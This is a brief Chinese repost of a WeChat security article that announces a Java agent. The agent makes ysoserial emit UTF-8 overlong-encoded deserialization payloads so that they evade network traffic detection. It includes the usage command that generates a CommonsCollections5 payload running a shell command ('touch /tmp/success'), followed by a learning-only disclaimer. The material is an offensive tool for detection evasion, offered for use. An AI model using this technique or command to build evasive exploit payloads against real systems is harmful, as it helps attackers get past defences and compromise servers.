使用 agent 替换writeUTF
和writeUTFBody
函数,从而在序列化时生成utf8 overlong数据,绕过流量层检测。
下载
用法:
在生成反序列化payload工具启动时添加 javaagent 参数即可
java -javaagent:/path/to/utf8-overlong-agent-1.0-SNAPSHOT-jar-with-dependencies.jar -jar ysoserial-0.0.5-all.jar CommonsCollections5 "touch /tmp/success"
仅限交流学习使用,如您在使用本工具或代码的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。“如侵权请私聊公众号删文”。
原文始发于微信公众号(柠檬赏金猎人):utf8 overlong agent
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论